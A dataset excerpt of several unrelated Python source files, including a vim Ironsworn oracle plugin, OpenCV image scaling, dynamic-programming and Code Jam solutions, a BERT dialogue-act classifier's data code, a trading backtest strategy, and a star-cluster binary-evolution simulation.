vim.current.window.cursor[0]\n lines = []\n lines.append(\"# Ironsworn combat action oracle:\")\n lines.append(\"# \" + oracles.IronswornCombatAction())\n vim.current.buffer.append(lines, cur_col)\n _update_cursor(len(lines))\n\n\ndef 
IronswornChallengeRankOracle():\n cur_col = vim.current.window.cursor[0]\n lines = []\n lines.append(\"# Ironsworn challenge rank oracle:\")\n lines.append(\"# \" + oracles.IronswornChallengeRank())\n vim.current.buffer.append(lines, cur_col)\n _update_cursor(len(lines))\n\n\ndef IronswornMysticBacklashOracle():\n cur_col = vim.current.window.cursor[0]\n lines = []\n lines.append(\"# Ironsworn mystic backlash oracle:\")\n lines.append(\"# \" + oracles.IronswornMysticBacklash())\n vim.current.buffer.append(lines, cur_col)\n _update_cursor(len(lines))\n\n\ndef IronswornMajorPlotTwistOracle():\n cur_col = vim.current.window.cursor[0]\n lines = []\n lines.append(\"# Ironsworn major plot twist oracle:\")\n lines.append(\"# \" + oracles.IronswornMajorPlotTwist())\n vim.current.buffer.append(lines, cur_col)\n _update_cursor(len(lines))\n","repo_name":"jhugon/rpgdieroller","sub_path":"rpgdieroller/vim.py","file_name":"vim.py","file_ext":"py","file_size_in_byte":5884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1655328122","text":"# 画像処理編\n# 6. アフィン変換により、画像を拡大縮小するプログラム\n\nimport cv2\nimport numpy as np\n\nimg = cv2.cvtColor(cv2.imread(\"../../data/Lenna.jpg\"), cv2.COLOR_BGR2GRAY)\n\nheight, width = img.shape[:2]\nratio = 2.0 # 画像を2倍に拡大する\n\n# アフィン変換を計算\n# src: Coordinates of triangle vertices in the source image.\n# dst: Coordinates of the corresponding triangle verices in the destination image.\nsrc = np.array([[0.0, 0.0], [0.0, 1.0], [1.0, 0.0]], np.float32)\naffine = cv2.getAffineTransform(src = src, dst = src * ratio)\n\n# アフィン変換を画像に適用\n# dsize: size of the output image.\n# flags で補間方法を指定できる\nresized_img = cv2.warpAffine(src = img, M = affine, dsize = (int(ratio) * height, int(ratio) * width), flags = cv2.INTER_LANCZOS4)\n\ncv2.imwrite(\"../../data/image-processing-chap/ip_6.jpg\", resized_img)\n","repo_name":"Kobamiyannnn/image-processing-with-opencv","sub_path":"src/image-processing-chap/6_img_scaling_by_affine_transformation.py","file_name":"6_img_scaling_by_affine_transformation.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28097274859","text":"class Solution:\n # @param A : tuple of integers\n # @return an integer\n def lis(self, A):\n n = len(A)\n dp = [0] * n\n dp[0] = 1\n # dp[1] = 1\n print(dp)\n print()\n\n for i in range(1, n):\n dp[i] = 1\n\n for j in range(i):\n if A[j] < A[i] and dp[j]+1 > dp[i]:\n dp[i] = dp[j] + 1\n print(dp)\n\n return max(dp)\n\n\nif __name__ == '__main__':\n a = [0, 8, 4, 12, 2, 10] # 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]\n obj = Solution()\n ans = obj.lis(a)\n print(f'ans is {ans}')\n","repo_name":"navkant/ds_algo_practice","sub_path":"scaler/dynamic_programming/llis.py","file_name":"llis.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23449912561","text":"fp = r\"C:\\Yam\\input.txt\"\r\nofp = r\"C:\\Yam\\output.txt\"\r\nwith open(fp, 'rb') as reader:\r\n content = reader.read().splitlines()\r\nwriter = open(ofp, 'wb')\r\n\r\ntests = int(content[0])\r\nreader = 1\r\nwhile reader <= tests:\r\n line = content[reader]\r\n ##################\r\n line = line.split()\r\n length, crowd = int(line[0]), line[1]\r\n crowd = crowd[:length+1]\r\n shy = 0\r\n standing = 0\r\n attending = 0\r\n while shy < len(crowd):\r\n if int(crowd[shy]) > 0:\r\n attending += max(0, shy-(standing+attending))\r\n 
standing += int(crowd[shy])\r\n print(crowd, shy, standing, attending)\r\n shy += 1\r\n ##################\r\n writer.write(\"Case #{x}: {y}\\n\".format(x=reader, y=attending))\r\n reader += 1\r\n \r\nwriter.close()","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_155/1723.py","file_name":"1723.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25072254252","text":"import logging\nimport os\nfrom typing import List, Optional, Union\nfrom transformers.data import DataProcessor, InputExample, InputFeatures, SingleSentenceClassificationProcessor\nfrom sklearn.metrics import f1_score, accuracy_score\nfrom transformers import (\n PreTrainedTokenizer,\n glue_compute_metrics,\n glue_output_modes,\n glue_processors\n)\nlogger = logging.getLogger(__name__)\n\ndef convert_examples_to_features(\n examples: List[InputExample],\n tokenizer: PreTrainedTokenizer,\n max_length: Optional[int] = None,\n task=None,\n label_list=None,\n output_mode=None,\n):\n if max_length is None:\n max_length = tokenizer.max_len\n\n if task is not None:\n processor = processors[task]()\n if label_list is None:\n label_list = processor.get_labels()\n logger.info(\"Using label list %s for task %s\" % (label_list, task))\n if output_mode is None:\n output_mode = output_modes[task]\n logger.info(\"Using output mode %s for task %s\" % (output_mode, task))\n\n label_map = {label: i for i, label in enumerate(label_list)}\n\n def label_from_example(example: InputExample) -> Union[int, float]:\n if output_mode == \"classification\":\n return label_map[example.label]\n elif output_mode == \"regression\":\n return float(example.label)\n raise KeyError(output_mode)\n\n labels = [label_from_example(example) for example in examples]\n\n batch_encoding = tokenizer.batch_encode_plus(\n [(example.text_a, example.text_b) for example in examples],\n max_length=max_length, padding=True, truncation=True, return_token_type_ids=True\n )\n\n features = []\n print(range(len(examples)))\n\n for i in range(len(examples)):\n inputs = {k: batch_encoding[k][i] for k in batch_encoding}\n feature = InputFeatures(**inputs, label=labels[i])\n features.append(feature)\n\n for i, example in enumerate(examples[:2]):\n logger.info(\"*** Example ***\")\n logger.info(\"guid: %s\" % (example.guid))\n logger.info(\"features: %s\" % features[i])\n\n return features\n\nclass SentenceDataProcessor(DataProcessor):\n def get_train_examples(self, data_dir):\n \"\"\"See base class.\"\"\"\"\"\n return self._create_examples(self._read_tsv(os.path.join(data_dir, \"train.tsv\")), \"train\")\n\n def get_dev_examples(self, data_dir):\n \"\"\"See base class.\"\"\"\"\"\n return self._create_examples(self._read_tsv(os.path.join(data_dir, \"dev.tsv\")), \"dev\")\n\n def get_test_examples(self, data_dir):\n \"\"\"See base class.\"\"\"\"\"\n return self._create_examples(self._read_tsv(os.path.join(data_dir, \"test.tsv\")), \"test\")\n\n def get_labels(self):\n return NotImplementedError\n\n def _create_examples(self, lines, set_type):\n examples = []\n for (i, line) in enumerate(lines):\n guid = \"%s-%s\" % (set_type, i)\n text_a = line[0]\n label = line[1]\n examples.append(InputExample(guid=guid, text_a=text_a, text_b=None, label=label))\n return examples\n\n# monkey-patch all glue classes to have test examples\ndef get_test_examples(self, data_dir):\n return self._create_examples(self._read_tsv(os.path.join(data_dir, \"test.tsv\")), 
\"test\")\n\nfor task in glue_processors:\n\n processor = glue_processors[task]\n processor.get_test_examples = get_test_examples\n\n\nclass flProcessor(SentenceDataProcessor):\n def get_labels(self):\n labels = ['RS', 'S', 'Q', 'A', 'PF', 'ACK', 'RF', 'NF', 'C', 'H', 'DIR', 'RC', 'LF']\n # labels = ['A', 'ACK', 'C', 'DIR', 'H', 'LF', 'NF', 'PF', 'Q', 'RC', 'RF', 'S']\n\n return labels\n\nclass slProcessor(SentenceDataProcessor):\n def get_labels(self):\n labels = ['ACK', 'AEX', 'AR', 'AWH', 'AYN', 'C', 'DIR', 'E', 'FNU', 'FU',\n 'GRE', 'HI', 'I', 'LF', 'NF', 'O', 'OEX', 'PF', 'QD', 'QEX', 'QF',\n 'QI', 'QO', 'QP', 'QQ', 'QR', 'R', 'RC', 'RF', 'RFI']\n\n return labels\n\nprocessors = glue_processors.copy()\nprocessors.update(\n {\"firstlevel\":flProcessor, \"secondlevel\": slProcessor}\n)\nprint(processors)\noutput_modes = glue_output_modes\noutput_modes.update(\n {\"firstlevel\":\"classification\", \"secondlevel\":\"classification\"}\n)\n\ndef compute_metrics(task_name, preds, labels):\n assert len(preds) == len(labels)\n if task_name in [\"firstlevel\", \"secondlevel\"]:\n return {\"f1\":f1_score(y_true=labels, y_pred=preds, average=\"weighted\"), \"acc\": accuracy_score(y_true=labels, y_pred=preds)}\n elif task_name in glue_processors:\n return glue_compute_metrics(task_name, preds, labels)\n else:\n raise NotImplementedError\n\n","repo_name":"bertDA/BertDA","sub_path":"src/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":4669,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"18685002582","text":"import math\nfrom os import curdir\nimport yfinance as yf\nimport time\nimport datetime\nimport matplotlib.pyplot as plt\n\nEPSILON = 0.000000001\nclass Strategy:\n\n\tdef __init__(self, stockData, budget, splitCount, profitRate, buyOnRiseRatio, delayTrade = 0, buyMoreUnderLossRatio = 0.00, logTrade = True, minimumLosscutRate = 1.0, name = ''):\n\t\tself.days_buy_lock = 0\n\t\tself.name = name\n\t\tself.budget = budget\n\t\tself.lastBalance = budget \n\t\tself.snapshotBalance = budget\n\t\tself.splitCount = splitCount\n\t\tself.profitRate = profitRate\n\t\tself.buyOnRiseRatio = buyOnRiseRatio\n\t\tself.stockData = stockData\n\t\tself.openPrices = stockData['Open']\n\t\tself.closePrices = stockData['Close']\n\t\tself.highPrices = stockData['High']\n\t\tself.lowPrices = stockData['Low']\n\t\tself.stockData['Date'] = stockData.index\n\t\tself.logTrade = logTrade\n\t\tself.minimumLosscutRate = minimumLosscutRate\n\t\tself.profitSellAmountRateAtOnce = 1\n\t\tself.lossSellAmountRateAtOnce = 1\n\n\t\tself.stockCount = 0\n\t\tself.breakEvenPrice = 0\n\t\tself.balanceHistory = []\n\t\tself.assetValueHistory = []\n\t\tself.delayTrade = delayTrade\n\t\tself.sellFee = 0.25/100\n\t\tself.buyFee = 0.25/100\n\t\tself.buyMoreUnderLossRatio = buyMoreUnderLossRatio\n\t\tself.score = 0\n\t\tself.recentScoreWeight = 1.0\n\t\tself.lastScore = 0\n\t\tself.scoreHistory = []\n\t\tself.trade_locked = False\n\t\tself.curBuyProgress = 0\n\t\tself.buyAmountUnit = self.budget / self.splitCount\n\t\tself.on_buy = 0 # fn(dayIndex, price, count)\n\t\tself.on_sell = 0 # fn(dayIndex, price, count)\n\n\tdef set_on_buy_fn(self, func):\n\t\tself.on_buy = func # fn(dayIndex, price, count)\n\n\tdef set_on_sell_fn(self, func):\n\t\tself.on_sell = func # fn(dayIndex, price, count)\n\t\n\n\tdef _buy_close(self, dayIndex, money) :\n\t\t#print(money)\n\t\tif(self.budget <= EPSILON):\n\t\t\treturn False\n\n\t\tif(self.budget - money < EPSILON):\n\t\t\treturn 
False\n\n\t\trecentPrice = self.closePrices[dayIndex - 1]\n\t\tcostPerStock = (recentPrice * (1.0 + self.buyFee))\n\t\tcount = (money / costPerStock)\n\t\tif count <= EPSILON:\n\t\t\treturn False\n\n\n\t\tprice = self.closePrices[dayIndex]\n\t\tself.breakEvenPrice = ( ( self.stockCount * self.breakEvenPrice ) + (count * price ) ) / (self.stockCount + count)\n\t\tself.stockCount += count\n\n\t\tif( count > 0):\n\t\t\tself.on_buy(dayIndex, price, count)\n\n\t\tif(self.budget == 0.):\n\t\t\tassert(0)\n\n\t\tself.budget -= (price * count) \n\n\t\tif(math.fabs(self.budget) < EPSILON):\n\t\t\tself.budget = 0\n\n\n\n\t\t#print(\"[BUY ] self.budget(%d) Count(%d) Mean(%f) BUY(%f)\" % (self.budget, self.stockCount, self.breakEvenPrice, close_value))\n\n\t\treturn True\n\t\n\tdef is_tradable(self, dayIndex):\n\t\tif(dayIndex < self.delayTrade):\n\t\t\treturn False\n\n\t\tsize = self.closePrices.size\n\t\tif dayIndex >= size:\n\t\t\treturn False\n\t\t\n\t\treturn True\n\n\t\n\tdef is_take_profit_condition(self, dayIndex, profitRate):\n\t\treturn self.breakEvenPrice * profitRate < float(self.highPrices[dayIndex])\n\n\tdef calc_balance(self, dayIndex):\n\t\treturn self.closePrices[dayIndex] * self.stockCount + self.budget\n\n\tdef sell_all_when_done(self, dayIndex ):\n\t\tprice_and_count = (0, 0)\n\t\tsold = 0\n\t\tsoldCount = 0\n\t\tif self.is_tradable(dayIndex) == False: return price_and_count\n\n\t\tif( self.stockCount == 0 ):\n\t\t\treturn price_and_count\n\n\t\tif(math.fabs(self.splitCount - self.curBuyProgress) <= EPSILON):\n\t\t\tself.curBuyProgress = self.splitCount\n\n\t\tassert(self.splitCount - self.curBuyProgress >= 0 )\n\n\t\tprogressRatio = self.curBuyProgress / self.splitCount\n\t\t#progressRatio = 1\n\t\tsellAmountRate = 0\n\n\t\tif(self.budget - self.buyAmountUnit <= 0):\n\t\t\t#if self.is_take_profit_condition(dayIndex, self.minimumLosscutRate) : # losscut\n\t\t\t\tprice = self.closePrices[dayIndex] \n\t\t\t\tsellAmountRate = self.lossSellAmountRateAtOnce\n\t\t\t\tsoldCount = self.stockCount * sellAmountRate\n\t\t\t\tsold = (soldCount * price)\n\t\t\t\tprice_and_count = (price, soldCount)\n\n\t\telif self.is_take_profit_condition(dayIndex, self.profitRate) : # take profit\n\t\t\tprice = self.breakEvenPrice * self.profitRate\n\t\t\t#sellAmountRate = self.profitSellAmountRateAtOnce * (0.5 + (progressRatio * progressRatio)*0.5)\n\t\t\tsellAmountRate = self.profitSellAmountRateAtOnce\n\t\t\tsoldCount = self.stockCount * sellAmountRate \n\t\t\tsold = soldCount * price\n\t\t\tprice_and_count = (price, soldCount)\n\n\t\tif sold > 0:\n\t\t\tself.budget += sold * (1.0 - self.sellFee)\n\t\t\tself.curBuyProgress *= (1.0 - sellAmountRate)\n\t\t\tself.stockCount -= soldCount\n\t\t\tself.lastBalance = self.calc_balance(dayIndex)\n\t\t\tself.buyAmountUnit = self.lastBalance / self.splitCount\n\t\t\t\n\t\t\tself.on_sell(dayIndex, price_and_count[0], price_and_count[1])\n\t\t\n\n\t\treturn price_and_count\n\t\n\t\n\t\n\tdef lock_trade(self):\n\t\tself.trade_locked = True\n\n\tdef is_trade_locked(self):\n\t\treturn self.trade_locked\n\n\tdef unlock_trade(self):\n\t\tself.trade_locked = False \n\n\tdef fill_budget(self, money):\n\t\tassetValue = self.lastBalance - self.budget\n\t\tself.budget += money\n\t\tself.lastBalance += money\n\t\tself.curBuyProgress = self.splitCount * assetValue / self.lastBalance\n\t\tself.buyAmountUnit = self.lastBalance / self.splitCount\n\n\tdef transfer_budget(self, desiredMoney):\n\t\ttransfered = 0\n\t\tif(self.budget > desiredMoney):\n\t\t\ttransfered = 
desiredMoney\n\t\telse:\n\t\t\ttransfered = self.budget\n\n\t\tself.budget -= transfered\n\t\tself.lastBalance -= transfered\n\t\tif(self.budget < 0):\n\t\t\tassert(0)\n\n\t\treturn transfered\n\n\tdef reserve_budget_at_close(self, dayIndex, desiredReserve):\n\n\t\tif(dayIndex == 0):\n\t\t\treturn 0\n\n\t\tif(desiredReserve <= self.budget): # already reserved\n\t\t\treturn desiredReserve\n\n#--------------------------------------------------------------------------------\n#\tcalc count by recentPrice\n#--------------------------------------------------------------------------------\n\t\trecentPrice = self.closePrices[dayIndex-1]\n\t\tcount = desiredReserve / recentPrice\n\t\tif(self.stockCount < count):\n\t\t\tcount = self.stockCount\n#--------------------------------------------------------------------------------\n\n\t\tself.stockCount -= count\n\t\tself.budget += count * self.closePrices[dayIndex] * (1.0 - self.sellFee);\n\t\tif( count > 0):\n\t\t\tself.on_sell(dayIndex, self.closePrices[dayIndex], count)\n\n\t\tif(desiredReserve <= self.budget): # finally reserved\n\t\t\treturn desiredReserve\n\t\treturn self.budget\n\n\n\tdef post_trade(self, dayIndex):\n\t\tself.assetValueHistory.append(self.stockCount * self.closePrices[dayIndex])\n\t\tself.balanceHistory.append(self.calc_balance(dayIndex))\n\n\tdef buy(self, dayIndex):\n\t\tif(dayIndex == 0):\n\t\t\tself.lastBalance = self.calc_balance(dayIndex)\n\t\t\treturn\n\t\tif( self.budget <= 0):\n\t\t\tself.lastBalance = self.calc_balance(dayIndex)\n\t\t\treturn\n\n\t\tbuyRatio = self.buyOnRiseRatio\n\n\t\topenPrice = float(self.closePrices[dayIndex-1])\n\t\tif self.breakEvenPrice < openPrice * 0.97 :\n\t\t\tif((self.curBuyProgress + buyRatio) >= self.splitCount):\n\t\t\t\tself.lastBalance = self.calc_balance(dayIndex)\n\t\t\t\treturn\n\n\t\t\tsuccess = self._buy_close(dayIndex, self.buyAmountUnit * buyRatio)\n\t\t\tif success == True:\n\t\t\t\tself.curBuyProgress += buyRatio\n\n\t\tbuyRatio = 1.0 - self.buyOnRiseRatio\n\t\tif((self.curBuyProgress + buyRatio) >= self.splitCount):\n\t\t\tself.lastBalance = self.calc_balance(dayIndex)\n\t\t\treturn\n\n\t\tsuccess = self._buy_close(dayIndex, self.buyAmountUnit * buyRatio)\n\t\tif success == True:\n\t\t\tself.curBuyProgress += buyRatio\n\n\n\t\tself.lastBalance = self.calc_balance(dayIndex)\n","repo_name":"quakenroll/infinite_buy","sub_path":"startegy2.py","file_name":"startegy2.py","file_ext":"py","file_size_in_byte":7159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22180991020","text":"import os\nimport numpy as np\nimport time\nimport astropy.units as u\nfrom galpy.potential import evaluatePotentials, KeplerPotential, HernquistPotential, PlummerPotential\nfrom galpy.util import conversion\nfrom binary_evolution import KeplerRing, PointMass\nfrom binary_evolution.tools import ecc_to_vel\n# from flybys3body import scattering_hybrid, scattering_SA\nfrom fortran.flybys3body_fortran import scattering_hybrid, scattering_SA\nfrom amuse.lab import *\nfrom numpy.random import default_rng\n\nimport matplotlib\nfrom matplotlib import pyplot\nfrom matplotlib.ticker import (MultipleLocator, AutoMinorLocator)\n\nG = constants.G\nc = constants.c\nHubbleTime = 1.4e10|units.yr\n_pc = 8000\n_kms = 220\n\ndef isfloat(value):\n\ttry:\n\t\tfloat(value)\n\t\treturn True\n\texcept ValueError:\n\t\treturn False\n\nclass inputParameters:\n\tdef __init__(self, t=1e4, a_out=0.5, e_out=0, inc_out=np.pi/6, m1=5, m2=5, a=1, e=0.05, i=1, Omega=1.5, omega=0, 
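# annotation, not in the original: the angle parameters (inc_out, i, Omega, omega) appear to be in radians, as suggested by the default inc_out=np.pi/6\n\t\t\t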
output_file='output.txt', output_file_2='', approximation=0, potential=\"Plummer\", m_total=4e6, b=1, rtol=1e-11, tmax=1e20, relativity=True, tidal_effects=True, gw=True, resume=False, includeEncounters=True, includeWeakEncounters=True, Q_max_a=50, Q_min_a=0, n=10, a_max=1000, sameParameters='', disableKicks=False, t0=0, m_per=1):\n\t\tself.t = t # Integration time [yr] \n\t\tself.a_out = a_out # Outer orbit semi-major axis [pc]\n\t\tself.e_out = e_out # Outer orbit eccentricity\n\t\tself.inc_out = inc_out # Outer orbit inclination\n\t\tself.m1 = m1 # Primary mass [MSun]\n\t\tself.m2 = m2 # Secondatu mass [MSun]\n\t\tself.a = a # Inner orbit semimajor axis [AU]\n\t\tself.e = e # Inner orbit eccentricity\n\t\tself.i = i # Inner orbit inclination\n\t\tself.Omega = Omega # Inner orbit longitude of ascending node\n\t\tself.omega = omega # Inner orbit argument of periapsis\n\t\tself.output_file = output_file # Output file name\n\t\tself.output_file_2 = output_file_2 # Additional output file name\n\t\tself.approximation = approximation # 0 - use precise if epsilon_gr<20 and GR-only otherwise; 1 - always precise; 2 - always GR-only\n\t\tself.potential = potential # Cluster potential\n\t\tself.b = b\n\t\tself.m_total = m_total\n\t\tself.rtol = rtol # Inner orbit integration accuracy\n\t\tself.tmax = tmax # Maximum calculation time [s]\n\t\tself.resume = resume # Resume the integration from the last line in self.output_file (ignores the provided initial conditions)\n\t\tself.includeWeakEncounters = includeWeakEncounters \n\t\tself.Q_max_a = Q_max_a # The maximum pericenter of the encounters to include\n\t\tself.Q_min_a = Q_min_a # The minimum pericenter of the encounters to include\n\t\tself.includeEncounters = includeEncounters \n\t\tself.n = n # The number of points per (approximate) outer orbital period used to interpolate the outer orbit \n\t\tself.relativity = relativity #include GR effects\n\t\tself.tidal_effects = tidal_effects #include tidal terms\n\t\tself.gw = gw #include GW emission\n\t\tself.a_max = a_max #Stop the integration if the inner binary semimajor axis exceeds this value in AU\n\t\tself.sameParameters = sameParameters #if not empty, take the initial conditions from that file (overwritten by resume)\n\t\tself.disableKicks = disableKicks #if True, encounters don't change the binary CM velocity \n\t\tself.t0 = t0 \t#initial time\n\t\tself.m_per = m_per \t#Perturber mass in M_Sun\n\ndef m_final(m):\n\tstellar = SSE()\n\tstellar.parameters.metallicity = 0.001\n\tstellar.particles.add_particle(Particle(mass=m))\n\tstellar.evolve_model(5|units.Gyr)\t\n\tresult = stellar.particles.mass.in_(units.MSun)\n\tstellar.stop()\n\treturn result\n\ndef sample_v_icdf (x, sigma_rel, n=10):\n# x = GM/Q_max/sigma_rel^2\n# u = v/sigma_rel\n\trng = default_rng()\n\trandom_number = rng.random()\n\tcdf1 = 0\n\ti = -1\n\twhile cdf1 < random_number:\n\t\ti += 1\n\t\tu1 = (i+1)/n\n\t\tcdf1 = 1-np.exp(-u1**2/2) - u1**2*np.exp(-u1**2/2)/2/(1+x)\n\tu0 = i/n\n\tcdf0 = 1-np.exp(-u0**2/2) - u0**2*np.exp(-u0**2/2)/2/(1+x)\t\n\tu = u0 + (u1-u0)*(random_number-cdf0)/(cdf1-cdf0)\n\treturn u*sigma_rel\n\ndef sample_v_hamers (sigma_rel, v0):\n# v0 = sqrt(GM/Q_max)\n\trng = default_rng()\n\twhile True:\n\t\tvz = np.sqrt(rng.exponential(2*sigma_rel.value_in(units.kms)**2))|units.kms\n\t\tvx = rng.normal(0, sigma_rel.value_in(units.kms))|units.kms\n\t\tvy = rng.normal(0, sigma_rel.value_in(units.kms))|units.kms\n\t\tv2 = vx**2+vy**2+vz**2\n\t\tif (v2 > 2*v0**2): break\n\treturn np.sqrt(v2 - 2*v0**2)\n\n# m_total = 
4e+6\n# b=1\n# pot = TwoPowerTriaxialPotential(amp=16*m_bh*u.solMass, a=4*u.pc, alpha=1, beta=4, c=0.7)\n# pot = PlummerPotential(amp=m_total*u.solMass, b=b*u.pc) \n\n# Q_max_a_default = 50\nQ_hybrid_a = 10\n# m_per = 1|units.MSun\n# m_per_max = m_per\n# sigma = 3|units.kms\n# n = 1e6|units.pc**-3\n\ndef sigma (r, type=\"Plummer\", m_total=4e6, b=1):\n\t# sqrt(2) * one-dimensional velocity dispersion\n\tif type==\"Plummer\": return np.sqrt(G*(m_total|units.MSun)/6/np.sqrt(r**2+(b|units.pc)**2))\n\telif type==\"Hernquist\": \n\t\tx = r/(b|units.pc)\n\t\t# print(x, 12*x*(x+1)**3*np.log(1+1/x) - x/(x+1)*(25+52*x+42*x**2+12*x**3))\n\t\treturn np.sqrt(G*(m_total|units.MSun)/12/(b|units.pc) * (12*x*(x+1)**3*np.log(1+1/x) - x/(x+1)*(25+52*x+42*x**2+12*x**3)))\n\telse: \n\t\treturn 0|units.kms\n\ndef rho (r, type=\"Plummer\", m_total=4e6, b=1):\n\tif type==\"Plummer\": return 3*(m_total|units.MSun)/4/np.pi/(b|units.pc)**3*(1+(r/(b|units.pc))**2)**-2.5\n\telif type==\"Hernquist\": return (m_total|units.MSun)/2/np.pi/(b|units.pc)**3/(r/(b|units.pc))*(1+r/(b|units.pc))**-3\n\telse: return 0|units.kg/units.m**3\n\ndef tau_0 (a, m_bin, r, Q_max_a=50, type=\"Plummer\", m_total=4e6, b=1, V=0|units.kms, m_per=1|units.MSun):\n\tQ_max = Q_max_a * a\n\tv0 = np.sqrt(G*(m_bin+m_per)/Q_max)\n\tsigma_rel = np.sqrt(sigma(r, type, m_total, b)**2 + V**2)\n\treturn (2*np.sqrt(2*np.pi)*Q_max**2*sigma_rel*(rho(r, type, m_total, b)/m_per)*(1+(v0/sigma_rel)**2))**-1\n\ndef a_h (m1, m2, r, type=\"Plummer\", m_total=4e6, b=1):\n\treturn (G*(m1*m2/(m1+m2)|units.MSun)/4/sigma(r|units.pc, type, m_total, b)**2).value_in(units.AU)\n\ndef sample_encounter_parameters_old (a, m_bin, r, Q_max_a=50, type=\"Plummer\", m_total=4e6, b=1, m_per=1|units.MSun):\n\tQ_max = Q_max_a * a\n\trng = default_rng()\n\tv0 = np.sqrt(G*(m_bin+m_per)/Q_max)\n\t# time until the encounter\n\t# tau = rng.exponential(tau_0(a,m_bin,n).value_in(units.yr))|units.yr\n\t# perturber mass\n\t# m_per = 1|units.MSun\n\t# perturber orbital parameters\n\t# v = sample_v_hamers (sigma(r), v0)\n\n\t# sigma -> sigma_rel!\n\tx = (v0/sigma(r, type, m_total, b))**2\n\tv = sample_v_icdf (x, sigma(r, type, m_total, b))\n\tp_max2 = Q_max**2*(1+2*(v0/v)**2)\n\tp = np.sqrt(p_max2*rng.random())\n\taStar = -G*(m_bin+m_per)/v**2\n\teStar = np.sqrt(1+p**2/aStar**2)\n\tiStar = np.arccos(rng.random()*2-1)\n\tOmegaStar = rng.random()*2*np.pi\n\tomegaStar = rng.random()*2*np.pi\n\treturn m_per, aStar, eStar, iStar, OmegaStar, omegaStar\n\ndef normalize (vector):\n\treturn vector / np.linalg.norm(vector)\n\ndef sample_encounter_parameters (a, m_bin, r, phi, Q_max_a=50, type=\"Plummer\", m_total=4e6, b=1, v_bin=[0,0,0], m_per=1|units.MSun):\n\t# returns the parameters in physical units\n\t# v_bin is the binary CM velocity [v_R, v_phi, v_z]=[v_x, v_y, v_z] in km/s \n\trng = default_rng()\n\n\tQ_max = Q_max_a * a.value_in(units.m)\n\tmu = (G*(m_bin+m_per)).value_in(units.m**3/units.s**2)\n\tv0 = np.sqrt(mu/Q_max)\n\tx = (v0/sigma(r, type, m_total, b).value_in(units.m/units.s))**2\n\tv = sample_v_icdf (x, sigma(r, type, m_total, b)).value_in(units.m/units.s)\n\n\ttheta_v = np.arccos(rng.random()*2-1)\n\tphi_v = rng.random()*2*np.pi\n\tv_x = v*np.sin(theta_v)*np.cos(phi_v)\n\tv_y = v*np.sin(theta_v)*np.sin(phi_v)\n\tv_z = v*np.cos(theta_v)\n\t#initial velocity vector in the binary reference frame\n\tv1 = [v_x-v_bin[0]*1000, v_y-v_bin[1]*1000, v_z-v_bin[2]*1000]\n\n\tp_max2 = Q_max**2*(1+2*(v0/np.linalg.norm(v1))**2)\n\tp = np.sqrt(p_max2*rng.random())\n\taStar = 
-mu/np.linalg.norm(v1)**2\n\teStar = np.sqrt(1+p**2/aStar**2)\n\n\t# unit vectors perpendicular to velocity\n\te1 = normalize([v1[1], -v1[0], 0])\n\te2 = normalize(np.cross(v1, e1))\n\tangle = rng.random()*2*np.pi\n\t# angular momentum\n\th = (e1*np.cos(angle) + e2*np.sin(angle)) * np.sqrt(mu*aStar*(1-eStar**2))\n\t# eccentricity vector\n\tecc_vector = np.cross(v1, h)/mu + normalize(v1)\n\n\t# now we convert all the vectors to the cluster reference frame\n\t# the unut vectors for that reference frame in cylindrical coordinates\n\tcluster_x = [np.cos(phi), -np.sin(phi), 0]\n\tcluster_y = [np.sin(phi), np.cos(phi), 0]\n\tcluster_z = [0, 0, 1]\n\trotation_matrix = [cluster_x, cluster_y, cluster_z]\n\t# transforming the vectors to the cluster reference frame\n\th = np.matmul(rotation_matrix, h)\n\tecc_vector = np.matmul(rotation_matrix, ecc_vector)\n\n\t# calculating the orbital angles\n\tiStar = np.arccos(normalize(h)[2])\n\t# vector pointitng towards the ascending node\n\tn = normalize([-h[1], h[0], 0])\n\tif n[0]==0 and n[1]==0:\n\t\tOmegaStar = 0\n\telse:\n\t\tOmegaStar = np.arccos(n[0])\n\t\tif n[1]<0: OmegaStar = 2*np.pi - OmegaStar\n\tif h[0]==0 and h[1]==0:\n\t\tomegaStar = np.arctan2(ecc_vector[1], ecc_vector[0])\n\t\tif h[2]<0: omegaStar = 2*np.pi - omegaStar\n\telse:\n\t\tomegaStar = np.arccos(np.dot(n, normalize(ecc_vector)))\n\t\tif ecc_vector[2]<0: omegaStar = 2*np.pi - omegaStar\n\treturn m_per, aStar|units.m, eStar, iStar, OmegaStar, omegaStar\n\n# Inner binary parameters\na_in = 0.01 # Semi-major axis in AU\necc = 0.05 \t# Eccentricity\ninc = np.pi/3 # Inclination with respect to the z-axis\nlong_asc = 0 # Longitude of the ascending node\narg_peri = np.pi / 2 # Arugment of pericentre\nm1 = 5\nm2 = 5\nm_bin = m1+m2 # Total mass in solar masses\nm_bin_init = m_bin|units.MSun\n# q = 1\n\n# M_max = max(m_bin_init+m_per_max, 3*m_per_max) \n\n# Outer binary parameters\necc_out = 0.0 # Outer orbit eccentricity\ninc_out = np.pi/6 # Outer orbit inclination\na_out = 0.5 # Outer semi-major axis in pc\n\n# Start at pericentre\nr = a_out * (1 - ecc_out) # Spherical radius\nR = r * np.cos(inc_out) # Cylindrical radius\nz = r * np.sin(inc_out) # Cylindrical height\n\n# output_file_name = os.path.dirname(os.path.abspath(__file__))+'/history-rtol7.txt'\n\n# is the binary hard?\n# a_h = G*(m1*m2/(m1+m2)|units.MSun)/4/sigma_rel(r|units.pc)**2\n# # print(a_in/a_h.value_in(units.AU))\n# Q=0.25\n# print(((a_in|units.AU)/(64/5 * Q * G**3 * (k.m()|units.MSun)**3 / c**5 / (a_in|units.AU)**3)).value_in(units.yr))\n# print(tau_0 (a_in|units.AU, m_bin|units.MSun, r|units.pc).value_in(units.yr))\n\n# k = 